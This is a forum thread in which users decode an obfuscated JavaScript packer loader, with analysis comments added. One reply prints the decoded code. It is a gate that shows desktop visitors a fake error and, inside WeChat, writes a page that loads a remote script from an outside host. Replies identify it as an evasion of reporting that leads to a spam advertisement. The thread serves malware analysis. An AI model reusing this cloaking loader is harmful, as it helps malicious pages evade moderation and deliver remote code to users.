// Packed loader exactly as pasted into the thread; comments added for analysis, code untouched.
//
// Structure: window.$php_url is assigned, then eval() runs whatever string the
// packer function (p, a, c, k, e, r) returns. Arguments at the call site:
//   p = payload text whose words were replaced by short tokens,
//   a = 62 (token radix), c = 103 (dictionary size),
//   k = keyword table ('|'-separated), e = 0 and r = {} are scratch slots.
// e(c) encodes an index as a base-62 token (0-9, a-z, then A-Z via c + 29).
//
// NOTE(review): as pasted this does not parse. The payload literal p is
// single-quoted but contains bare single quotes (e.g. `5 e='';`), so the string
// ends early. Presumably the original escaped them; the paste lost that.
// NOTE(review): the $php_url value contains spaces as pasted; likely altered
// when posted, unconfirmed.
//
// Analysis notes:
// - The packer itself uses only String/RegExp/parseInt, no DOM. To read the
//   payload, print the function's return value instead of passing it to eval,
//   in an isolated environment rather than a normal browser session.
// - The keyword table (userAgent, platform, micromessenger, win, mac,
//   document/open/write, history/pushState, unescape, loadhtml, php) is
//   consistent with a client-side gate that serves different content depending
//   on the visitor's UA/platform and then writes a page pulling a remote script
//   from $php_url. A scan from a desktop UA would likely see only the error
//   text, so static decoding is the more reliable way to review it.
window.$php_url = "//api. chmochee. com /rpx"; eval(function (p, a, c, k, e, r) { e = function (c) { return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36)) }; if (!''.replace(/^/, String)) { while (c--) r[e(c)] = k[c] || e(c); k = [
// Fast path (replace() accepts a function replacer): the dictionary was folded
// into r above; k becomes a single lookup function and e() a generic word regex,
// so one pass (c = 1) substitutes every token.
function (e) {
return r[e]
}
];
e = function () {
return '\\w+'
};
c = 1
};
// Substitution pass: replace each whole-word token e(c) in p with k[c].
while (c--)
if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
return p
// Call site: packed payload, radix, dictionary size, keyword table, scratch values.
}('(j(a,b){a(b)})(j(a){5 b=y.S.t();5 c=y.Y.t();5 d=F.N("R/k","V");5 e='';n(!/B/.C(b)||c.s("K")==0||c.s("O")==0){e="网络错误,请重新打开!!!"}Q{n(q(m.$g)=='u'||m.$g<=''){m.$g='//Z.11.1a.1b.1z/1B'}5 f=0;n(q(h.l)!='u'){f=h.l}h.D(f+1,"E","#"+a(p)+(G H).I());e=J("%7%L%M%2%4%P%2%4%1E%2%4%3%3%3%3%r%T-U%9%W-X%6%o%9%10/k%v%12%13-8%6%2%4%3%3%3%3%r%14%9%15%6%o%9%16%17-18%19-w%x.0%1c-w%x.0%1d-1e%1f%6/%2%4%3%3%3%3%1g%2%7/1h%2%4%7/1i%2%4%1j%1k%9%1l%1m%1n%v%6%2%4%1o%1p%9%6"+1q($g)+"/1r.1s%6%2%7/1t%2%4%7/1u%2%4%7/k%2")}d.1v(e);d.1w()},j(a){ a=a||p; 5 b='1x'; 5 c=b.l; 5 d=''; 1y(i=0;i<a;i++){ d+=b.1A(z.1C(z.1D()*c)); } A d});', 62, 103, '||3E|20|0A|var|22|3C||3D|||||||php_url|history||function|html|length|window|if|20content|32|typeof|3Cmeta|indexOf|toLowerCase|undefined|3B|scale|3D1|navigator|Math|return|micromessenger|test|pushState|message|document|new|Date|getTime|unescape|win|21DOCTYPE|20html|open|mac|3Chtml|else|text|userAgent|20http|equiv|replace|22Content|Type|platform|apple|22text|cloud|20charset|3Dutf|20name|22viewport|22width|3Ddevice|width|2Cinitial|theshop|com|2Cmaximum|2Cuser|scalable|3D0|3Ctitle|title|head|3Cbody|20style|22background|3A|23fff2e5|3Cscript|20src|escape|loadhtml|php|script|body|write|close|ABCDEFGHJKMNPQRSTWXYZabcdefhijkmnprstwxyz2345678|for|cn|charAt|rpx|floor|random|3Chead'.split('|'), 0, {}));
1
xssp OP 好心的大佬,帮个忙,谢谢了。
|
2
OpenJerry 2018-06-17 19:49:28 +08:00
|
3
yankebupt 2018-06-17 20:23:02 +08:00
如果你运气好有可能这是用某个 js 框架写的,没保护过的话有对应浏览器调试插件恢复易读格式...比如某些 react...
如果真的做过混淆或者就不打算调试了没留后路估计 GG 了... |
6
aristotll 2018-06-17 20:57:30 +08:00
复制粘贴能拷贝好吗?至少也要用 markdown 排一下格式吧
把你的内容粘贴进去全部报错 就不想看了 |
7
xiaocsl 2018-06-17 21:25:34 +08:00 1
eval 里面的结果肯定是一个字符串,你单纯地执行一下里面的函数(比如把外层的 eval 换成 console.log,只打印不运行),返回的字符串就是要执行的代码.
不过你复制的代码, function (p, a, c, k, e, r) 这个函数里第一个参数 p 不知道是你复制的问题,还是说在其他代码里有些小 hack ,直接执行的话,因为参数 p 不是个正确的字符串,所以会报错.手动改一下引号就行了.最后执行出的结果是. (function(a, b) { a(b) })(function(a) { var b = navigator.userAgent.toLowerCase(); var c = navigator.platform.toLowerCase(); var d = document.open("text/html", "replace"); var e = ""; if (!/micromessenger/.test(b) || c.indexOf("win") == 0 || c.indexOf("mac") == 0) { e = "网络错误,请重新打开!!!" } else { if (typeof(window.$php_url) == "undefined " || window.$php_url <= "") { window.$php_url = " //apple.cloud.theshop.com.cn/rpx" } var f = 0; if (typeof(history.length) != "undefined") { f = history.length } history.pushState(f + 1, "message", "#" + a(32) + (new Date).getTime()); e = unescape("%3C%21DOCTYPE%20html%3E%0A%3Chtml%3E%0A%3Chead%3E%0A%20%20%20%20%3Cmeta%20http-equiv%3D%22Content-Type%22%20content%3D%22text/html%3B%20charset%3Dutf-8%22%3E%0A%20%20%20%20%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%2Cinitial-scale%3D1.0%2Cmaximum-scale%3D1.0%2Cuser-scalable%3D0%22/%3E%0A%20%20%20%20%3Ctitle%3E%3C/title%3E%0A%3C/head%3E%0A%3Cbody%20style%3D%22background%3A%23fff2e5%3B%22%3E%0A%3Cscript%20src%3D%22" + escape($php_url) + "/loadhtml.php%22%3E%3C/script%3E%0A%3C/body%3E%0A%3C/html%3E") } d.write(e); d.close() }, function(a) { a = a || 32; var b = "ABCDEFGHJKMNPQRSTWXYZabcdefhijkmnprstwxyz2345678"; var c = b.length; var d = ""; for (i = 0; i < a; i++) { d += b.charAt(Math.floor(Math.random() * c)); } return d }); |
8
xiaocsl 2018-06-17 21:37:12 +08:00
也或者有啥我不知道的一些 JS 特性,如果有大佬知道的话,麻烦 @我一下哈.
|
9
manhere 2018-06-17 21:40:58 +08:00 via Android 2
很明显这是实现了一个微信防封防举报功能
|
10
yankebupt 2018-06-17 23:28:48 +08:00 1
@manhere 感谢。没仔细看还以为可能是 js 框架封装的事件 dispatcher...
不过用 UA 和 platform 真能躲过人工举报审核么... 要么这作者强猜审核员是 win 或 mac 而不是 mobile 模拟器什么的... 要不就是真的举报过,然后钓鱼抓取过审核员的 UA/platform,真的是 win 或 mac... |
12
wuhau 2018-06-17 23:53:25 +08:00 1
http@//apple[dot]cloud. ***shop[dot]com[dot]cn/ rpx /loa**tml [dot] php 访问后获取到一段 js.
然后将页面的 data['html'] 的值做 base64 解码(base64 只是编码,不是加密),发现又引用了一个 www [dot] li*kte*h [dot] cn 的 CPS 壮阳广告 |
22
Leigg 2018-06-18 22:44:32 +08:00 via iPhone
qq 浏览器有个 js 美化插件
|